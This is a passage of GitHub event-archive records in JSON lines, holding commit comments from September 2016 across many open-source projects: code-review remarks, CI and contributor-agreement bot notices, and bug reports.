or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEOoEhFTuy4cGNvPx9pyl759KiK-iqB_ks5qvQgygaJpZM4KK5Gr>\n> .\n>\n"}},"created_at":"2016-09-30T13:21:41Z"}
{"id":"4643394526","type":"CommitCommentEvent","actor":{"login":"Alkarex"},"repo":{"name":"jangernert/FeedReader"},"payload":{"comment":{"id":19240794,"position":null,"line":null,"path":null,"commit_id":"a5486367ae14cdbb30046656d06401de7fa93e19","created_at":"2016-09-30T13:22:06Z","updated_at":"2016-09-30T13:22:06Z","body":"https://github.com/jangernert/FeedReader/issues/59"}},"created_at":"2016-09-30T13:22:06Z"}
{"id":"4643399842","type":"CommitCommentEvent","actor":{"login":"tsauerwein"},"repo":{"name":"c2corg/v6_common"},"payload":{"comment":{"id":19240809,"position":16,"line":623,"path":"c2corg_common/attributes.py","commit_id":"a59e9583b2801103515a8aaab97d15a263633f62","created_at":"2016-09-30T13:23:06Z","updated_at":"2016-09-30T13:23:06Z","body":"If we remove `draft` as article category, this would have to be taken in to account during the migration (check if an article has the category `draft`, if so set the quality to `draft`. Isn't `draft` the default anyway?)."}},"created_at":"2016-09-30T13:23:06Z"}
{"id":"4643400189","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/bobtemplates.plone"},"payload":{"comment":{"id":19240810,"position":null,"line":null,"path":null,"commit_id":"a27a7c1e475bd3a54767c9975a1c2c0106a94469","created_at":"2016-09-30T13:23:11Z","updated_at":"2016-09-30T13:23:11Z","body":"@AuroreMariscal you need to sign Plone Contributor Agreement in order to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html"}},"created_at":"2016-09-30T13:23:11Z"}
{"id":"4643400272","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/bobtemplates.plone"},"payload":{"comment":{"id":19240811,"position":null,"line":null,"path":null,"commit_id":"a27a7c1e475bd3a54767c9975a1c2c0106a94469","created_at":"2016-09-30T13:23:11Z","updated_at":"2016-09-30T13:23:11Z","body":"AuroreMariscal your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-30T13:23:11Z"}
{"id":"4643403133","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240814,"position":139,"line":139,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/wizards/SelectColorSchemePage.java","commit_id":"b8025048ca6c0c98e5af0e37dcf5f91d59e63140","created_at":"2016-09-30T13:23:45Z","updated_at":"2016-09-30T13:23:45Z","body":"Maybe not a french name, better English"}},"created_at":"2016-09-30T13:23:45Z"}
{"id":"4643404380","type":"CommitCommentEvent","actor":{"login":"MSGhero"},"repo":{"name":"HaxeFlixel/flixel"},"payload":{"comment":{"id":19240820,"position":9,"line":null,"path":"flixel/animation/FlxAnimation.hx","commit_id":"f959b9c66732cd119eb0b2c3e322506f07334782","created_at":"2016-09-30T13:23:59Z","updated_at":"2016-09-30T13:23:59Z","body":"Dang ok. I'm on a mobile app so I can't see those comments in my feed."}},"created_at":"2016-09-30T13:23:59Z"}
{"id":"4643406336","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240823,"position":30,"line":30,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/wizards/SelectColorSchemeWizard.java","commit_id":"b8025048ca6c0c98e5af0e37dcf5f91d59e63140","created_at":"2016-09-30T13:24:23Z","updated_at":"2016-09-30T13:24:23Z","body":"Add description"}},"created_at":"2016-09-30T13:24:23Z"}
{"id":"4643406442","type":"CommitCommentEvent","actor":{"login":"stijnvanhoey"},"repo":{"name":"PieterjanVerhelst/resident-eel-polder-analysis"},"payload":{"comment":{"id":19240825,"position":43,"line":43,"path":"src/Creeks_dataH_analysis.R","commit_id":"3c9cda45a0d31e1466910a14a01ee825f962a2cd","created_at":"2016-09-30T13:24:24Z","updated_at":"2016-09-30T13:24:24Z","body":"What is the difference between the `Arrival` column and the `Arrival_time` column, apart from the format?"}},"created_at":"2016-09-30T13:24:24Z"}
{"id":"4643409005","type":"CommitCommentEvent","actor":{"login":"vipk31"},"repo":{"name":"vipk31/ionic"},"payload":{"comment":{"id":19240828,"position":null,"line":null,"path":null,"commit_id":"207b84bc4aa11c6323dd534d4265dd0caa9606ed","created_at":"2016-09-30T13:24:55Z","updated_at":"2016-09-30T13:24:55Z","body":"redme"}},"created_at":"2016-09-30T13:24:55Z"}
{"id":"4643409274","type":"CommitCommentEvent","actor":{"login":"peterjacobs"},"repo":{"name":"zodb/relstorage"},"payload":{"comment":{"id":19240829,"position":null,"line":null,"path":null,"commit_id":"7025b3db7650c4418dd9eb912ede995fe7abab38","created_at":"2016-09-30T13:24:58Z","updated_at":"2016-09-30T13:24:58Z","body":"fix works fine in our environment"}},"created_at":"2016-09-30T13:24:58Z"}
{"id":"4643410235","type":"CommitCommentEvent","actor":{"login":"gerritbruening"},"repo":{"name":"faustedition/faust-web"},"payload":{"comment":{"id":19240832,"position":null,"line":null,"path":null,"commit_id":"9634e9672ff08f438b4775975c0425804dbf21fc","created_at":"2016-09-30T13:25:09Z","updated_at":"2016-09-30T13:25:09Z","body":"Fine 👍 "}},"created_at":"2016-09-30T13:25:09Z"}
{"id":"4643410945","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"bgrainger/MySqlConnector"},"payload":{"comment":{"id":19240834,"position":null,"line":null,"path":null,"commit_id":"09b45fce026fdc77db94ab9262de10f414ed85a0","created_at":"2016-09-30T13:25:16Z","updated_at":"2016-09-30T13:25:16Z","body":"> DNS resolution (earlier in this method) is forced to be asynchronous anyway\r\n\r\nsocket.Connect and ConnectAsync have the option to accept a `(string host, int port)` argument that will do the DNS resolution for us.  Can we remove the DNS resolution earlier in the method and use this instead?"}},"created_at":"2016-09-30T13:25:16Z"}
{"id":"4643410950","type":"CommitCommentEvent","actor":{"login":"Hellowlol"},"repo":{"name":"JonnyWong16/plexpy"},"payload":{"comment":{"id":19240833,"position":null,"line":null,"path":null,"commit_id":"03de680915276028137be7ba3dc2fe4764bfec91","created_at":"2016-09-30T13:25:16Z","updated_at":"2016-09-30T13:25:16Z","body":"This should prop be refactored now as this is added to the api. Im not sure it will handle mo() at all."}},"created_at":"2016-09-30T13:25:16Z"}
{"id":"4643411714","type":"CommitCommentEvent","actor":{"login":"monperrus"},"repo":{"name":"INRIA/spoon"},"payload":{"comment":{"id":19240836,"position":null,"line":null,"path":null,"commit_id":"cff5f642a89212a48bf9a14f65f0b83548f920f6","created_at":"2016-09-30T13:25:24Z","updated_at":"2016-09-30T13:25:24Z","body":"the CtPackage test looks  fine. "}},"created_at":"2016-09-30T13:25:24Z"}
{"id":"4643417634","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/bobtemplates.plone"},"payload":{"comment":{"id":19240851,"position":null,"line":null,"path":null,"commit_id":"ebfad7126d0f266fa0138b7439267ef541fed6b1","created_at":"2016-09-30T13:26:32Z","updated_at":"2016-09-30T13:26:32Z","body":"@AuroreMariscal you need to sign Plone Contributor Agreement in order to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html"}},"created_at":"2016-09-30T13:26:32Z"}
{"id":"4643417666","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/bobtemplates.plone"},"payload":{"comment":{"id":19240852,"position":null,"line":null,"path":null,"commit_id":"ebfad7126d0f266fa0138b7439267ef541fed6b1","created_at":"2016-09-30T13:26:32Z","updated_at":"2016-09-30T13:26:32Z","body":"AuroreMariscal your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-30T13:26:32Z"}
{"id":"4643418549","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240854,"position":4,"line":552,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/FeatureDiagramEditor.java","commit_id":"77ac731e1befc60af414ff4dda40c355562d0053","created_at":"2016-09-30T13:26:42Z","updated_at":"2016-09-30T13:26:42Z","body":"Without selection of a feature?"}},"created_at":"2016-09-30T13:26:42Z"}
{"id":"4643419926","type":"CommitCommentEvent","actor":{"login":"Tordesillas"},"repo":{"name":"MIAOU-Polytech/BRAINF-CK_SI3"},"payload":{"comment":{"id":19240858,"position":8,"line":6,"path":"build.sh","commit_id":"94c16bfcf5b3b4118248401c24153233adf53bcd","created_at":"2016-09-30T13:26:59Z","updated_at":"2016-09-30T13:26:59Z","body":"Fix that shit."}},"created_at":"2016-09-30T13:26:59Z"}
{"id":"4643424541","type":"CommitCommentEvent","actor":{"login":"aamirafridi"},"repo":{"name":"tes/redux-plupload"},"payload":{"comment":{"id":19240869,"position":null,"line":null,"path":null,"commit_id":"b15016b48e3d3a9fdd7cd1579726db95bc2910ee","created_at":"2016-09-30T13:27:53Z","updated_at":"2016-09-30T13:27:53Z","body":"@rouanw we had a an issue on app-application-tracker with this module. We spent 2 days on trying to find out why our bundle was failing and hence breaking the cdn. We were getting very unhelpful errors.\r\nTurned out that the lib/index.js file is bundled using babel transpiler. We are not using babel in our project and running our app with node 6.0 with requires instead of imports etc. Getting babel in our bundle was messing everything so I tried the above by using npm link and everything worked (although a test is failing with my above changes). This is a not a pull request but just wanted to show you if you can find a way to make the above changes. I was struggling with these 2 lines https://github.com/tes/redux-plupload/blob/master/es6/index.js#L2-L3"}},"created_at":"2016-09-30T13:27:53Z"}
{"id":"4643428633","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19240878,"position":4,"line":3,"path":"app/team/card/card.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T13:28:42Z","updated_at":"2016-09-30T13:28:42Z","body":"Better extract templates into separate file"}},"created_at":"2016-09-30T13:28:42Z"}
{"id":"4643433050","type":"CommitCommentEvent","actor":{"login":"widdowquinn"},"repo":{"name":"nickp60/pyutilsnrw"},"payload":{"comment":{"id":19240884,"position":10,"line":609,"path":"pyutilsnrw/utils3_5.py","commit_id":"0f913df9d4aac3867bb987c82b0faaa1f7d6a888","created_at":"2016-09-30T13:29:34Z","updated_at":"2016-09-30T13:29:34Z","body":"I'd commented these because reporting to `sys.stdout` or `sys.stderr` from within a function can break the output from calling scripts/applications. Communication should be by raising errors or passing logger messages."}},"created_at":"2016-09-30T13:29:34Z"}
{"id":"4643439502","type":"CommitCommentEvent","actor":{"login":"wagner"},"repo":{"name":"DeveloperCielo/Webservice-1.5"},"payload":{"comment":{"id":19240901,"position":null,"line":null,"path":null,"commit_id":"f9ca53cb918c1bcbd43d7cfed44ebc22d1fbde09","created_at":"2016-09-30T13:30:46Z","updated_at":"2016-09-30T13:30:46Z","body":"@netojoaobatista Pelo que vi aqui, o servidor de vocês já manda o certificado da Cielo e o intermediário \"Symantec Class 3 EV SSL CA - G3\", que por sua vez é validado contra o \"VeriSign Class 3 Public Primary Certification Authority - G5\" que já consta no trust store de qualquer sistema operacional. Ou seja, se a configuração do sistema operacional ou da biblioteca HTTP usada estiver com o trust store padrão, não é necessário instalar ou atualizar nada."}},"created_at":"2016-09-30T13:30:46Z"}
{"id":"4643440272","type":"CommitCommentEvent","actor":{"login":"seh"},"repo":{"name":"go-kit/kit"},"payload":{"comment":{"id":19240903,"position":12,"line":12,"path":"sd/consul/integration_test.go","commit_id":"9a19822c46c494bdac0944b8e5da6fc8684536e7","created_at":"2016-09-30T13:30:54Z","updated_at":"2016-09-30T13:30:54Z","body":"This package doesn't exist any longer—at least not at that import path. I'm guessing that no one has noticed because the `build` tag precludes compilation of this file."}},"created_at":"2016-09-30T13:30:54Z"}
{"id":"4643443128","type":"CommitCommentEvent","actor":{"login":"widdowquinn"},"repo":{"name":"nickp60/pyutilsnrw"},"payload":{"comment":{"id":19240907,"position":4,"line":603,"path":"pyutilsnrw/utils3_5.py","commit_id":"0f913df9d4aac3867bb987c82b0faaa1f7d6a888","created_at":"2016-09-30T13:31:28Z","updated_at":"2016-09-30T13:31:28Z","body":"The `check` and `verbose` arguments seemed unnecessary.\r\n\r\nThe `verbose` argument in particular is unusual in a utilities library like this - verbosity controls the detail of messaging to the user, and the ways in which a utility library should communicate are different: exceptions or log messages."}},"created_at":"2016-09-30T13:31:28Z"}
{"id":"4643445343","type":"CommitCommentEvent","actor":{"login":"pentium90"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":19240913,"position":null,"line":null,"path":null,"commit_id":"15ece0f14c12536cdf6e14cf07f14487afb941fe","created_at":"2016-09-30T13:31:53Z","updated_at":"2016-09-30T13:31:53Z","body":"$sysDescr, 'Pulse Connect Secure' - This is incorrect, our Pulse devices will only be discovered after I changed string to only 'Pulse Secure', because NMPv2-SMI::mib-2.1.1.0 returns:\r\n\r\nsysDescr.0 = STRING: Pulse Secure, LLC,Pulse Connect Secure,VA-SPE,8.2R1 (build 41241)\r\nsysDescr.0 = STRING: Pulse Secure,LLC,SA-2500,8.0R13 (build 38659)\r\nsysDescr.0 = STRING: Pulse Secure,LLC,SA-6500,8.0R13 (build 38659)\r\n\r\n"}},"created_at":"2016-09-30T13:31:53Z"}
{"id":"4643452053","type":"CommitCommentEvent","actor":{"login":"jgf"},"repo":{"name":"jgf/uaa"},"payload":{"comment":{"id":19240932,"position":null,"line":null,"path":null,"commit_id":"cdf267b977c544551510c5f28e3c4ad3f103c846","created_at":"2016-09-30T13:33:09Z","updated_at":"2016-09-30T13:33:09Z","body":"Found with the help of Holger Koser.\r\n\r\nGiven $TOKEN contains a valid token for user login, the following http request led to an error:\r\n\r\ncurl 'https://uaa.cf.<redacted>/authenticate' -d \"source=login&origin=ldap&username=newuser&add_new=true&email=wrongformat\" -H 'Accept: application/json' -H \"Authorization: bearer $TOKEN\" -s -k\r\n\r\nResponse: {“error\":\"error\"}\r\n\r\nUpon inspecting the server logs we found:\r\n\r\nRemoteAuthenticationEndpoint: Failed to authenticate user \r\njava.lang.ArrayIndexOutOfBoundsException: 1\r\n\tat org.cloudfoundry.identity.uaa.authentication.manager.LoginAuthenticationManager.getUser(LoginAuthenticationManager.java:159)\r\n\tat org.cloudfoundry.identity.uaa.authentication.manager.LoginAuthenticationManager.authenticate(LoginAuthenticationManager.java:83)\r\n\tat org.cloudfoundry.identity.uaa.authentication.RemoteAuthenticationEndpoint.authenticate(RemoteAuthenticationEndpoint.java:123)\r\n\tat sun.reflect.GeneratedMethodAccessor304.invoke(Unknown Source)\r\n..."}},"created_at":"2016-09-30T13:33:09Z"}
{"id":"4643453238","type":"CommitCommentEvent","actor":{"login":"widdowquinn"},"repo":{"name":"nickp60/pyutilsnrw"},"payload":{"comment":{"id":19240936,"position":24,"line":621,"path":"pyutilsnrw/utils3_5.py","commit_id":"0f913df9d4aac3867bb987c82b0faaa1f7d6a888","created_at":"2016-09-30T13:33:21Z","updated_at":"2016-09-30T13:33:21Z","body":"This should be caught at application level, IMO:\r\n\r\n```\r\nscript: request records from utils\r\nutils: open file and return contents\r\nscript: do these contents look like expected? Y -> continue; N -> do something appropriate\r\n```\r\n\r\nHere, the `SeqIO.parse()` function will handle most if not all formatting and other errors."}},"created_at":"2016-09-30T13:33:21Z"}
{"id":"4643459466","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19240945,"position":null,"line":null,"path":null,"commit_id":"ccdc13171f6787b5eee31547158b41bf3e38e82c","created_at":"2016-09-30T13:34:32Z","updated_at":"2016-09-30T13:34:32Z","body":"One use case that comes to mind is `Ret(relation)`, but it is valid to `Ret` anything. This happens in `examples/tugofwar.hk` -- see `Ret(a_pull < b_pull)` below:\r\n```\r\n$ simplify --debug tugofwar.hk \r\nSent to Maple:\r\nuse Hakaru, NewSLO in timelimit(90, RoundTrip(eval(eval(Bind(Gaussian(0, 1), alice, Bind(Gaussian(0, 1), bob, Bind(Gaussian(0, 1), carol, Bind(app(app(winner, alice), bob), match1, Bind(app(app(winner, bob), carol), match2, Bind(app(app(winner, alice), carol), match3, case(And(match1, match2), Branches(Branch(PDatum(true, PInl(PDone)), Ret(match3)), Branch(PDatum(false, PInr(PInl(PDone))), Msum()))))))))), winner=(lam(a, HReal(), lam(b, HReal(), Bind(app(pulls, a), a_pull, Bind(app(pulls, b), b_pull, Ret(a_pull < b_pull))))))), pulls=(lam(strength, HReal(), Gaussian(strength, 1)))), HMeasure(HData(DatumStruct(true,[]),DatumStruct(false,[]))))) end use;\r\nError, (in simplify/exp) time expired\r\n```"}},"created_at":"2016-09-30T13:34:32Z"}
{"id":"4643474277","type":"CommitCommentEvent","actor":{"login":"widdowquinn"},"repo":{"name":"nickp60/pyutilsnrw"},"payload":{"comment":{"id":19240970,"position":28,"line":625,"path":"pyutilsnrw/utils3_5.py","commit_id":"0f913df9d4aac3867bb987c82b0faaa1f7d6a888","created_at":"2016-09-30T13:37:15Z","updated_at":"2016-09-30T13:37:15Z","body":"This should not be needed. You have used the `with` idiom, which will have closed the filestream once you leave the codeblock, but the record itself will still be there for checking - no need to open again.\r\n\r\nThe specific circumstance you check for might result for a number of valid, and distinct, reasons. If the 'error' is detected, the function is also choosing to exit at the system level - this should be a choice for the calling application **if it is appropriate for the application**. As it stood, the `sys.exit()` would only be called if there was a logger, so output was also not predictable."}},"created_at":"2016-09-30T13:37:15Z"}
{"id":"4643475075","type":"CommitCommentEvent","actor":{"login":"kadiks"},"repo":{"name":"LeReacteur/exerslide"},"payload":{"comment":{"id":19240972,"position":null,"line":null,"path":null,"commit_id":"8d7b5e2cf07ac744cdbda970e8e8a094e5a4e06a","created_at":"2016-09-30T13:37:24Z","updated_at":"2016-09-30T13:37:24Z","body":"Awesome, I didn't know. I'll do that instead"}},"created_at":"2016-09-30T13:37:24Z"}
{"id":"4643475777","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19240975,"position":null,"line":null,"path":null,"commit_id":"a21946abd9359ed56566d597c7e88cdc6bb356a8","created_at":"2016-09-30T13:37:32Z","updated_at":"2016-09-30T13:37:32Z","body":"@nyalldawson I'd like to look in to this, but my (Windows) build environment is broken, since Qt5 was mandatory. I might need some help there. I emailed Jürgen, but he hasn't responded yet. Do you know someone, who can help me?"}},"created_at":"2016-09-30T13:37:32Z"}
{"id":"4643477172","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19240981,"position":null,"line":null,"path":null,"commit_id":"d40716433b0ebd529eca7ae790f55f087dd0ed74","created_at":"2016-09-30T13:37:48Z","updated_at":"2016-09-30T13:37:48Z","body":"No need for this. We can only use HAL1 now...."}},"created_at":"2016-09-30T13:37:48Z"}
{"id":"4643480388","type":"CommitCommentEvent","actor":{"login":"widdowquinn"},"repo":{"name":"nickp60/pyutilsnrw"},"payload":{"comment":{"id":19240988,"position":14,"line":58,"path":"tests/utils3_5_tests.py","commit_id":"0f913df9d4aac3867bb987c82b0faaa1f7d6a888","created_at":"2016-09-30T13:38:22Z","updated_at":"2016-09-30T13:38:22Z","body":"You can use `setUp()` as a single location to define input files, directories, and other constants. That is easier to manage and follow than defining them in the individual test functions."}},"created_at":"2016-09-30T13:38:22Z"}
{"id":"4643483164","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19240998,"position":null,"line":null,"path":null,"commit_id":"4799889104e794273c8d5d28719ba10f4b185d26","created_at":"2016-09-30T13:38:54Z","updated_at":"2016-09-30T13:38:54Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1222](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14701&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T13:38:54Z"}
{"id":"4643485455","type":"CommitCommentEvent","actor":{"login":"xieranmaya"},"repo":{"name":"xieranmaya/blog"},"payload":{"comment":{"id":19241002,"position":4,"line":3,"path":"README.md","commit_id":"a5128cb87b4b690187c6b2b4e12ce5e7e7d17da7","created_at":"2016-09-30T13:39:17Z","updated_at":"2016-09-30T13:39:17Z","body":"this is a note"}},"created_at":"2016-09-30T13:39:17Z"}
{"id":"4643485462","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":19241003,"position":null,"line":null,"path":null,"commit_id":"fc67c14c9baa28cc70333176dc8d959a76c9c8e7","created_at":"2016-09-30T13:39:17Z","updated_at":"2016-09-30T13:39:17Z","body":"зачем исключать Generic.kl ?"}},"created_at":"2016-09-30T13:39:17Z"}
{"id":"4643485534","type":"CommitCommentEvent","actor":{"login":"widdowquinn"},"repo":{"name":"nickp60/pyutilsnrw"},"payload":{"comment":{"id":19241004,"position":1,"line":36,"path":"tests/utils3_5_tests.py","commit_id":"0f913df9d4aac3867bb987c82b0faaa1f7d6a888","created_at":"2016-09-30T13:39:18Z","updated_at":"2016-09-30T13:39:18Z","body":"If I install `pyutilsnrw.utils3_5` locally (as I do, in a `venv`), the test uses the installed version in preference to the local source code version. Is that the behaviour you want?"}},"created_at":"2016-09-30T13:39:18Z"}
{"id":"4643485677","type":"CommitCommentEvent","actor":{"login":"rav-rav"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19241005,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T13:39:19Z","updated_at":"2016-09-30T13:39:19Z","body":"The way the new debugging output is done you could still have proper debug information when using notch first and then lpf. The result is slightly better which is more important in my opinion.\r\nIn pid.c it's the same: Notch first and then lpf to smoothen out the slightly jagged result from notch filter."}},"created_at":"2016-09-30T13:39:19Z"}
{"id":"4643487382","type":"CommitCommentEvent","actor":{"login":"widdowquinn"},"repo":{"name":"nickp60/pyutilsnrw"},"payload":{"comment":{"id":19241010,"position":33,"line":238,"path":"tests/utils3_5_tests.py","commit_id":"0f913df9d4aac3867bb987c82b0faaa1f7d6a888","created_at":"2016-09-30T13:39:40Z","updated_at":"2016-09-30T13:39:40Z","body":"See the comment itself… ;)"}},"created_at":"2016-09-30T13:39:40Z"}
{"id":"4643488388","type":"CommitCommentEvent","actor":{"login":"asamy"},"repo":{"name":"asamy/ksm"},"payload":{"comment":{"id":19241014,"position":null,"line":null,"path":null,"commit_id":"5fab256360b5cf970698cb760bbd3d264a330aab","created_at":"2016-09-30T13:39:51Z","updated_at":"2016-09-30T13:39:51Z","body":"Still need to allocate large pages instead cause this 500ms is cruical and is enough to get a BSOD from win32k."}},"created_at":"2016-09-30T13:39:51Z"}
{"id":"4643490456","type":"CommitCommentEvent","actor":{"login":"susemi99"},"repo":{"name":"susemi99/GitKrakenTest"},"payload":{"comment":{"id":19241020,"position":null,"line":null,"path":null,"commit_id":"b87ce0c7262b9af79a75343d006bc8fa0b5b8d44","created_at":"2016-09-30T13:40:13Z","updated_at":"2016-09-30T13:40:13Z","body":"신기하군 "}},"created_at":"2016-09-30T13:40:13Z"}
{"id":"4643491869","type":"CommitCommentEvent","actor":{"login":"luipir"},"repo":{"name":"boundlessgeo/qgis-geoserver-plugin"},"payload":{"comment":{"id":19241025,"position":13,"line":29,"path":"geoserverexplorer/gui/dialogs/catalogdialog.py","commit_id":"07689016738b9dd3858a50eb1dc24aa71e533b15","created_at":"2016-09-30T13:40:27Z","updated_at":"2016-09-30T13:40:27Z","body":"lack of:\r\nfrom pyqt4 import qtcore"}},"created_at":"2016-09-30T13:40:27Z"}
{"id":"4643492825","type":"CommitCommentEvent","actor":{"login":"aamirafridi"},"repo":{"name":"tes/redux-plupload"},"payload":{"comment":{"id":19241030,"position":null,"line":null,"path":null,"commit_id":"b15016b48e3d3a9fdd7cd1579726db95bc2910ee","created_at":"2016-09-30T13:40:38Z","updated_at":"2016-09-30T13:40:38Z","body":"To clarify, we use babel to create the bundle for client but we are not using babel on server.\r\nNot sure why our bundle is crashing with this module import but its something to do with having babel getting bundled in lib/index.js "}},"created_at":"2016-09-30T13:40:38Z"}
{"id":"4643492885","type":"CommitCommentEvent","actor":{"login":"laf"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":19241031,"position":null,"line":null,"path":null,"commit_id":"15ece0f14c12536cdf6e14cf07f14487afb941fe","created_at":"2016-09-30T13:40:39Z","updated_at":"2016-09-30T13:40:39Z","body":"I suggest you create an issue and provide the information we need in the support for adding a new OS link."}},"created_at":"2016-09-30T13:40:39Z"}
{"id":"4643494328","type":"CommitCommentEvent","actor":{"login":"bcjosej"},"repo":{"name":"bcjosej/RepoConfig"},"payload":{"comment":{"id":19241038,"position":null,"line":null,"path":null,"commit_id":"41c6fb3d8e7c58decb144cc537ce3fee9dab4176","created_at":"2016-09-30T13:40:56Z","updated_at":"2016-09-30T13:40:56Z","body":"Mi primer commit"}},"created_at":"2016-09-30T13:40:56Z"}
{"id":"4643495110","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19241039,"position":null,"line":null,"path":null,"commit_id":"4799889104e794273c8d5d28719ba10f4b185d26","created_at":"2016-09-30T13:41:04Z","updated_at":"2016-09-30T13:41:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1222](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14701&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:02:10"}},"created_at":"2016-09-30T13:41:04Z"}
{"id":"4643496441","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19241041,"position":37,"line":59,"path":"index.js","commit_id":"2171973b3caa9135a3ebe3a1437919cba0d0334a","created_at":"2016-09-30T13:41:19Z","updated_at":"2016-09-30T13:41:19Z","body":"Heh. But then that’d encourage people to write code too tightly coupled to any platforms which provide more than 2 arguments to the `app()` function. Convince me that I shouldn’t worry about that and I’ll change it ;-)."}},"created_at":"2016-09-30T13:41:19Z"}
{"id":"4643496549","type":"CommitCommentEvent","actor":{"login":"widdowquinn"},"repo":{"name":"nickp60/pyutilsnrw"},"payload":{"comment":{"id":19241042,"position":null,"line":null,"path":null,"commit_id":"0f913df9d4aac3867bb987c82b0faaa1f7d6a888","created_at":"2016-09-30T13:41:20Z","updated_at":"2016-09-30T13:41:20Z","body":"For the purposes of `riboSelect.py` I don't think you needed to write a utility function to load a list of GenBank records - the `SeqIO.parse()` function - which you wrap. The rest of that function doesn't seem to justify the wrapping."}},"created_at":"2016-09-30T13:41:20Z"}
{"id":"4643498546","type":"CommitCommentEvent","actor":{"login":"technomancy"},"repo":{"name":"RamiLego4Game/LIKO-12"},"payload":{"comment":{"id":19241046,"position":34,"line":109,"path":"runtime.lua","commit_id":"45536a8cc0ad553dd8f23d5701ccff902ac8c72b","created_at":"2016-09-30T13:41:41Z","updated_at":"2016-09-30T13:41:41Z","body":"What kind of bugs were you seeing here? Maybe we should fix them instead of duplicating code."}},"created_at":"2016-09-30T13:41:41Z"}
{"id":"4643498981","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19241047,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-30T13:41:46Z","updated_at":"2016-09-30T13:41:46Z","body":"You must adb shell and then cat /proc/kmsg if you want to read the kernel logs in real time.. It's working fine with latest twrp on both s4 and mi5.. You can try to catch last_kmsg after phone stuck and you force reboot in recovery, but probably this won't work as the phone doesn't reboot by itself. Regarding adb after boot it doesn't work because if the phone stucks at Sammy logo then even the kernel is not loaded"}},"created_at":"2016-09-30T13:41:46Z"}
{"id":"4643500498","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19241052,"position":14,"line":71,"path":"compiler/frontend.java/src/org/jetbrains/kotlin/resolve/jvm/TopDownAnalyzerFacadeForJVM.kt","commit_id":"d9b97ca97cceaed3164a50960d4cae8f518c1caa","created_at":"2016-09-30T13:42:04Z","updated_at":"2016-09-30T13:42:04Z","body":"Could it be local `var resolver: JavaDescriptorResolver by Delegates.notNull()`?\r\nIt helps to convert this object to simple lambda"}},"created_at":"2016-09-30T13:42:04Z"}
{"id":"4643503335","type":"CommitCommentEvent","actor":{"login":"jef-n"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19241060,"position":null,"line":null,"path":null,"commit_id":"a21946abd9359ed56566d597c7e88cdc6bb356a8","created_at":"2016-09-30T13:42:36Z","updated_at":"2016-09-30T13:42:36Z","body":"I don't have a qt5 environment on windows either yet."}},"created_at":"2016-09-30T13:42:36Z"}
